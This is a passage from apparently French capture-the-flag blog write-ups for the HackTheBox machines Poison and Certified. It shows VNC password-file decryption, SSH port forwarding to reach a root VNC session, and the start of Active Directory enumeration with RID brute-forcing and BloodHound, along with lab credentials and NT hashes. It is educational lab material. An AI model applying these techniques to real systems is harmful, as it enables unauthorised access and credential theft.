FreeBSD installed: freebsd-version <span class="p">;</span> uname -a </span></span><span class="line"><span class="cl">Please include that output and any error messages when posting questions. </span></span><span class="line"><span class="cl">Introduction to manual pages: man man </span></span><span class="line"><span class="cl">FreeBSD directory layout: man hier </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Edit /etc/motd to change this login announcement. </span></span><span class="line"><span class="cl">Man pages are divided into section depending on topic. There are <span class="m">9</span> different </span></span><span class="line"><span class="cl">sections numbered from <span class="m">1</span> <span class="o">(</span>General Commands<span class="o">)</span> to <span class="m">9</span> <span class="o">(</span>Kernel Developer<span class="err">&#39;</span>s Manual<span class="o">)</span>. </span></span><span class="line"><span class="cl">You can get an introduction to each topic by typing </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> man &lt;number&gt; intro </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">In other words, to get the intro to general commands, <span class="nb">type</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> man <span class="m">1</span> intro </span></span><span class="line"><span class="cl">charix@Poison:~ % cat user.txt </span></span><span class="line"><span class="cl">eaac.....209c </span></span></code></pre></td></tr></table> </div> </div><p>On a donc : charix : <code>Charix!2#4%6&amp;8(0</code></p> <h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="secretzip">secret.zip </h3><p>On découvre un fichier secret.zip chiffré à la racine du home de charlix. On peut le déchiffrer avec le meme mdp que popur le ssh de charlix: <code>Charix!2#4%6&amp;8(0</code></p> <p>On découvre un fichier de 8 caracteres chiffrés</p> <h3 id="vnc-launched-by-root">VNC launched by root </h3><p>En regardant les process executés par root, on découvre une sessions VNC ouverte sur le port 5901, lancé par root. Si on arrive a s&rsquo;y connecté, on peut optentiellemnt avec un shell en tant que root.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">╚ Check weird <span class="p">&amp;</span> unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes </span></span><span class="line"><span class="cl">root <span class="m">1</span> 0.0 0.1 <span class="m">5408</span> <span class="m">1040</span> - SLs 22:56 0:00.00 /sbin/init -- </span></span><span class="line"><span class="cl">root <span class="m">319</span> 0.0 0.5 <span class="m">9560</span> <span class="m">5052</span> - Ss 22:56 0:00.09 /sbin/devd </span></span><span class="line"><span class="cl">root <span class="m">390</span> 0.0 0.2 <span class="m">10500</span> <span class="m">2452</span> - Ss 22:56 0:00.04 /usr/sbin/syslogd -s </span></span><span class="line"><span class="cl">root <span class="m">543</span> 0.0 0.5 <span class="m">56320</span> <span class="m">5396</span> - S 22:57 0:01.18 /usr/local/bin/vmtoolsd -c /usr/local/share/vmware-tools/tools.conf -p /usr/local/lib/open-vm-tools/plugins/vmsvc </span></span><span class="line"><span class="cl">root <span class="m">620</span> 0.0 0.7 <span class="m">57812</span> <span class="m">7052</span> - Is 22:57 0:00.01 /usr/sbin/sshd </span></span><span class="line"><span class="cl">root <span class="m">625</span> 0.0 1.1 <span class="m">99172</span> <span class="m">11516</span> - Ss 22:58 0:00.06 /usr/local/sbin/httpd -DNOHTTPACCEPT </span></span><span class="line"><span class="cl">root <span class="m">642</span> 0.0 0.6 <span class="m">20636</span> <span class="m">6140</span> - Ss 22:58 0:00.03 sendmail: accepting connections <span class="o">(</span>sendmail<span class="o">)</span> </span></span><span class="line"><span class="cl">root <span class="m">650</span> 0.0 0.2 <span class="m">12592</span> <span class="m">2436</span> - Ss 22:59 0:00.01 /usr/sbin/cron -s </span></span><span class="line"><span class="cl">root <span class="m">529</span> 0.0 0.9 <span class="m">23620</span> <span class="m">8872</span> v0- I 22:57 0:00.02 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth <span class="m">24</span> -rfbwait <span class="m">120000</span> -rfbauth /root/.vnc/passwd -rfbport <span class="m">5901</span> -localhost -nolisten tcp :1 </span></span><span class="line"><span class="cl">root <span class="m">540</span> 0.0 0.7 <span class="m">67220</span> <span class="m">7064</span> v0- I 22:57 0:00.01 xterm -geometry 80x24+10+10 -ls -title X Desktop </span></span><span class="line"><span class="cl">root <span class="m">541</span> 0.0 0.5 <span class="m">37620</span> <span class="m">5312</span> v0- I 22:57 0:00.00 twm </span></span><span class="line"><span class="cl">root <span class="m">697</span> 0.0 0.2 <span class="m">10484</span> <span class="m">2076</span> v0 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv0 </span></span><span class="line"><span class="cl">root <span class="m">698</span> 0.0 0.2 <span class="m">10484</span> <span class="m">2076</span> v1 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv1 </span></span><span class="line"><span class="cl">root <span class="m">699</span> 0.0 0.2 <span class="m">10484</span> <span class="m">2076</span> v2 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv2 </span></span><span class="line"><span class="cl">root <span class="m">700</span> 0.0 0.2 <span class="m">10484</span> <span class="m">2076</span> v3 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv3 </span></span><span class="line"><span class="cl">root <span class="m">701</span> 0.0 0.2 <span class="m">10484</span> <span class="m">2076</span> v4 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv4 </span></span><span class="line"><span class="cl">root <span class="m">702</span> 0.0 0.2 <span class="m">10484</span> <span class="m">2076</span> v5 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv5 </span></span><span class="line"><span class="cl">root <span class="m">703</span> 0.0 0.2 <span class="m">10484</span> <span class="m">2076</span> v6 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv6 </span></span><span class="line"><span class="cl">root <span class="m">704</span> 0.0 0.2 <span class="m">10484</span> <span class="m">2076</span> v7 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv7 </span></span><span class="line"><span class="cl">root <span class="m">617</span> 0.0 0.4 <span class="m">19660</span> <span class="m">3616</span> <span class="m">0</span> Is+ 22:57 0:00.00 -csh <span class="o">(</span>csh<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="dechiffrement-du-fichier-secret">Dechiffrement du fichier secret </h3><p>Finalement, on emet l&rsquo;hypothese que le fichier secret serait un fichier de mot de passe chiffré pour vnc. On tente d&rsquo;utiliser un outil github pour le déchiffré : <a class="link" href="https://github.com/jeroennijhof/vncpwd" target="_blank" rel="noopener" >https://github.com/jeroennijhof/vncpwd</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Poison<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ git clone https://github.com/jeroennijhof/vncpwd.git </span></span><span class="line"><span class="cl">Cloning into <span class="s1">&#39;vncpwd&#39;</span>... </span></span><span class="line"><span class="cl">remote: Enumerating objects: 28, <span class="k">done</span>. </span></span><span class="line"><span class="cl">remote: Total <span class="m">28</span> <span class="o">(</span>delta 0<span class="o">)</span>, reused <span class="m">0</span> <span class="o">(</span>delta 0<span class="o">)</span>, pack-reused <span class="m">28</span> <span class="o">(</span>from 1<span class="o">)</span> </span></span><span class="line"><span class="cl">Receiving objects: 100% <span class="o">(</span>28/28<span class="o">)</span>, 22.15 KiB <span class="p">|</span> 1.85 MiB/s, <span class="k">done</span>. </span></span><span class="line"><span class="cl">Resolving deltas: 100% <span class="o">(</span>9/9<span class="o">)</span>, <span class="k">done</span>. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Poison<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ <span class="nb">cd</span> vncpwd </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Poison/vncpwd<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ls </span></span><span class="line"><span class="cl">d3des.c d3des.h LICENSE Makefile README vncpwd.c </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Poison/vncpwd<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ make </span></span><span class="line"><span class="cl">gcc -Wall -g -o vncpwd vncpwd.c d3des.c </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Poison/vncpwd<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ./vncpwd ../secret </span></span><span class="line"><span class="cl">Password: VNCP@<span class="nv">$$</span>! </span></span></code></pre></td></tr></table> </div> </div><p>On obtient le mot de passe: <code>VNCP@$$!</code></p> <h3 id="connexion-sur-la-session-vnc---root-flag">Connexion sur la session VNC - root flag </h3><p>On peut se connecter a une session VNC facilement en utilisant l&rsquo;outil <code>vncviewer</code>. Mais le port 5901 n&rsquo;est dispo qu&rsquo;en local sur la machine ! Je propose de résoudre ce probleme en faisant du port forwarding sur ma machine, à l&rsquo;aide l&rsquo;option -L de ssh.</p> <p>Ensuite j&rsquo;ai pu utiliser vncviewer et ouvrir la session avec le mot de passe obtenu</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Poison<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh charix@10.10.10.84 -L 5901:localhost:5901 </span></span><span class="line"><span class="cl">Charix!2#4%6<span class="p">&amp;</span>8<span class="o">(</span><span class="m">0</span> </span></span><span class="line"><span class="cl"><span class="o">(</span>charix@10.10.10.84<span class="o">)</span> Password <span class="k">for</span> charix@Poison: </span></span><span class="line"><span class="cl">Last login: Tue Mar <span class="m">4</span> 23:11:10 <span class="m">2025</span> from 10.10.14.19 </span></span><span class="line"><span class="cl">FreeBSD 11.1-RELEASE <span class="o">(</span>GENERIC<span class="o">)</span> <span class="c1">#0 r321309: Fri Jul 21 02:08:28 UTC 2017</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Welcome to FreeBSD! </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">--------------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Poison/vncpwd<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap localhost -p <span class="m">5901</span> </span></span><span class="line"><span class="cl">Starting Nmap 7.94SVN <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2025-03-04 17:35 EST </span></span><span class="line"><span class="cl">Nmap scan report <span class="k">for</span> localhost <span class="o">(</span>127.0.0.1<span class="o">)</span> </span></span><span class="line"><span class="cl">Host is up <span class="o">(</span>0.000067s latency<span class="o">)</span>. </span></span><span class="line"><span class="cl">Other addresses <span class="k">for</span> localhost <span class="o">(</span>not scanned<span class="o">)</span>: ::1 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORT STATE SERVICE </span></span><span class="line"><span class="cl">5901/tcp open vnc-1 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Nmap <span class="k">done</span>: <span class="m">1</span> IP address <span class="o">(</span><span class="m">1</span> host up<span class="o">)</span> scanned in 0.13 seconds </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Poison/vncpwd<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ vncviewer localhost </span></span><span class="line"><span class="cl">vncviewer: ConnectToTcpAddr: connect: Connection refused </span></span><span class="line"><span class="cl">Unable to connect to VNC server </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Poison/vncpwd<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ vncviewer localhost:5901 </span></span><span class="line"><span class="cl">Connected to RFB server, using protocol version 3.8 </span></span><span class="line"><span class="cl">Enabling TightVNC protocol extensions </span></span><span class="line"><span class="cl">Performing standard VNC authentication </span></span><span class="line"><span class="cl">Password: </span></span><span class="line"><span class="cl">Authentication successful </span></span><span class="line"><span class="cl">Desktop name <span class="s2">&#34;root&#39;s X desktop (Poison:1)&#34;</span> </span></span><span class="line"><span class="cl">VNC server default format: </span></span><span class="line"><span class="cl"> <span class="m">32</span> bits per pixel. </span></span><span class="line"><span class="cl"> Least significant byte first in each pixel. </span></span><span class="line"><span class="cl"> True colour: max red <span class="m">255</span> green <span class="m">255</span> blue 255, <span class="nb">shift</span> red <span class="m">16</span> green <span class="m">8</span> blue <span class="m">0</span> </span></span><span class="line"><span class="cl">Using default colormap which is TrueColor. Pixel format: </span></span><span class="line"><span class="cl"> <span class="m">32</span> bits per pixel. </span></span><span class="line"><span class="cl"> Least significant byte first in each pixel. </span></span><span class="line"><span class="cl"> True colour: max red <span class="m">255</span> green <span class="m">255</span> blue 255, <span class="nb">shift</span> red <span class="m">16</span> green <span class="m">8</span> blue <span class="m">0</span> </span></span><span class="line"><span class="cl">Same machine: preferring raw encoding </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">--------- VNCVIEWER ------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">root@Poison:~ <span class="c1"># whoami</span> </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl">root@Poison:~ <span class="c1"># cat root.txt</span> </span></span><span class="line"><span class="cl">716d.....61f5 </span></span></code></pre></td></tr></table> </div> </div>HTB | Certifiedhttps://leopoldabgn.github.io/writeups/p/certified-htb/Wed, 11 Dec 2024 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/certified-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Certified cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Certified</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.41</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">User : judith.mader, Password : judith09 </span></span><span class="line"><span class="cl">User : management_svc, NT <span class="nb">hash</span> : a091c1832bcdd4677c28b5a6a1295584 </span></span><span class="line"><span class="cl">User : ca_operator, NT <span class="nb">hash</span> : 94994b74f29662fc4d702f2f3b0df327 </span></span><span class="line"><span class="cl">User : Administrator, LM/NT <span class="nb">hash</span> : aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34 </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nmap 10.10.11.41 -Pn </span></span><span class="line"><span class="cl">Starting Nmap 7.80 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2024-12-08 14:07 CET </span></span><span class="line"><span class="cl">Nmap scan report <span class="k">for</span> 10.10.11.41 </span></span><span class="line"><span class="cl">Host is up <span class="o">(</span>0.060s latency<span class="o">)</span>. </span></span><span class="line"><span class="cl">Not shown: <span class="m">992</span> filtered ports </span></span><span class="line"><span class="cl">PORT STATE SERVICE </span></span><span class="line"><span class="cl">53/tcp open domain </span></span><span class="line"><span class="cl">135/tcp open msrpc </span></span><span class="line"><span class="cl">139/tcp open netbios-ssn </span></span><span class="line"><span class="cl">389/tcp open ldap </span></span><span class="line"><span class="cl">445/tcp open microsoft-ds </span></span><span class="line"><span class="cl">464/tcp open kpasswd5 </span></span><span class="line"><span class="cl">636/tcp open ldapssl </span></span><span class="line"><span class="cl">3269/tcp open globalcatLDAPssl </span></span></code></pre></td></tr></table> </div> </div><h3 id="enumerating-users---smb">Enumerating Users - smb </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nxc smb 10.10.11.41 -u <span class="s1">&#39;judith.mader&#39;</span> -p <span class="s1">&#39;judith09&#39;</span> -d <span class="s1">&#39;certified.htb&#39;</span> --rid-brute </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 <span class="o">[</span>*<span class="o">]</span> Windows 10.0 Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC01<span class="o">)</span> <span class="o">(</span>domain:certified.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 <span class="o">[</span>+<span class="o">]</span> certified.htb<span class="se">\j</span>udith.mader:judith09 </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 498: CERTIFIED<span class="se">\E</span>nterprise Read-only Domain Controllers <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 500: CERTIFIED<span class="se">\A</span>dministrator <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 501: CERTIFIED<span class="se">\G</span>uest <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 502: CERTIFIED<span class="se">\k</span>rbtgt <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 512: CERTIFIED<span class="se">\D</span>omain Admins <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 513: CERTIFIED<span class="se">\D</span>omain Users <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 514: CERTIFIED<span class="se">\D</span>omain Guests <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 515: CERTIFIED<span class="se">\D</span>omain Computers <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 516: CERTIFIED<span class="se">\D</span>omain Controllers <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 517: CERTIFIED<span class="se">\C</span>ert Publishers <span class="o">(</span>SidTypeAlias<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 518: CERTIFIED<span class="se">\S</span>chema Admins <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 519: CERTIFIED<span class="se">\E</span>nterprise Admins <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 520: CERTIFIED<span class="se">\G</span>roup Policy Creator Owners <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 521: CERTIFIED<span class="se">\R</span>ead-only Domain Controllers <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 522: CERTIFIED<span class="se">\C</span>loneable Domain Controllers <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 525: CERTIFIED<span class="se">\P</span>rotected Users <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 526: CERTIFIED<span class="se">\K</span>ey Admins <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 527: CERTIFIED<span class="se">\E</span>nterprise Key Admins <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 553: CERTIFIED<span class="se">\R</span>AS and IAS Servers <span class="o">(</span>SidTypeAlias<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 571: CERTIFIED<span class="se">\A</span>llowed RODC Password Replication Group <span class="o">(</span>SidTypeAlias<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 572: CERTIFIED<span class="se">\D</span>enied RODC Password Replication Group <span class="o">(</span>SidTypeAlias<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1000: CERTIFIED<span class="se">\D</span>C01$ <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1101: CERTIFIED<span class="se">\D</span>nsAdmins <span class="o">(</span>SidTypeAlias<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1102: CERTIFIED<span class="se">\D</span>nsUpdateProxy <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1103: CERTIFIED<span class="se">\j</span>udith.mader <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1104: CERTIFIED<span class="se">\M</span>anagement <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1105: CERTIFIED<span class="se">\m</span>anagement_svc <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1106: CERTIFIED<span class="se">\c</span>a_operator <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1601: CERTIFIED<span class="se">\a</span>lexander.huges <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1602: CERTIFIED<span class="se">\h</span>arry.wilson <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1603: CERTIFIED<span class="se">\g</span>regory.cameron <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="bloodhound-python">Bloodhound-python </h3><p>On execute bloodhound-python pour récupérer des données sur l&rsquo;Active directory.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">sudo bloodhound-python -d CERTIFIED.HTB -u <span class="s1">&#39;judith.mader&#39;</span> -p <span class="s1">&#39;judith09&#39;</span> -dc certified.htb -c All --zip -ns 10.10.11.41 </span></span><span class="line"><span class="cl">INFO: Found AD domain: certified.htb </span></span><span class="line"><span class="cl">INFO: Getting TGT <span class="k">for</span> user </span></span><span class="line"><span class="cl">WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW<span class="o">(</span>Clock skew too great<span class="o">)</span> </span></span><span class="line"><span class="cl">INFO: Connecting to LDAP server: certified.htb </span></span><span class="line"><span class="cl">INFO: Found <span class="m">1</span> domains </span></span><span class="line"><span class="cl">INFO: Found <span class="m">1</span> domains in the forest 